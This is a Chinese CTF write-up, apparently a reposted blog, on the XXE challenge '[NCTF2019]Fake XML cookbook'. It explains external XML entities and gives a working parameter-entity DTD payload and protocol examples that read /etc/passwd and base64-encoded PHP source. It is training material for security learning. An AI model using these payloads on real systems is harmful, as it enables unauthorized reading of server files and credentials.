当前位置: 首页 > news >正文

XXE漏洞 [NCTF2019]Fake XML cookbook1

打开题目

查看源代码

发现我们post传入的数据都被放到了doLogin.php下面

访问一下看看

提示加载外部xml实体

我们知道外部xml实体的格式是

<!ENTITY 实体名称 SYSTEM "URI/URL">

bp抓包一下看看

得到flag

或者这样

但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里

PHP引用外部实体,常见的利用协议
file://文件绝对路径

如:

file:///etc/passwd

http://url/file.txt

php://filter/read=convert.base64-encode/resource=xxx.php

参数实体+外部实体

<!ENTITY % 实体名称 SYSTEM "URI/URL">

参数实体+外部实体

示例代码:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "file:///etc/passwd">

%file;

]>

%file(参数实体)是在DTD中被引用的,而&file;是在xml文档中被引用的。

最简单的xxe注入

 知识点源于:XML注入攻击总结_xml攻击-CSDN博客

从XML相关一步一步到XXE漏洞 - 先知社区

http://www.dtcms.com/a/5562.html

相关文章:

  • SQL Server 安装教程
  • MySQL——表的增删查改
  • 软件设计模式:UML类图
  • 概率论复习
  • 竞赛保研 python的搜索引擎系统设计与实现
  • 基于YOLOv8的草莓病害检测,加入EMA注意力和GPFN提升病害检测能力
  • [Ray Tracing in One Weekend] 笔记
  • Golang(壹)
  • OpenHarmony开发环境快速搭建(无需命令行)
  • LeetCode 每日一题 Day 17 || 二分
  • Flink系列之:SQL提示
  • 让AIGC成为你的智能外脑,助力你的工作和生活
  • 八股文打卡day1——计算机网络(1)
  • 八股文打卡day2——计算机网络(2)
  • el-select二次封装实现可分页加载数据
  • 什么店生意好?C++采集美团商家信息做数据分析
  • Python Django 连接 PostgreSQL 操作实例
  • React 组件生命周期
  • R语言|分面中嵌入趋势线
  • 【Spark面试】Spark面试题答案
  • ARM MMU简介
  • 【计算机网络】—— 详解码元,传输速率的计算|网络奇缘系列|计算机网络
  • 【Spark精讲】Spark存储原理
  • 基于Pytest+Requests+Allure实现接口自动化测试
  • 322. 零钱兑换
  • HTML5面试题
  • Java小技巧:创建带缓存的过程
  • spring-cloud-starter-gateway-mvc的网关实现
  • 将包上传到 npm
  • 深度学习之模型权重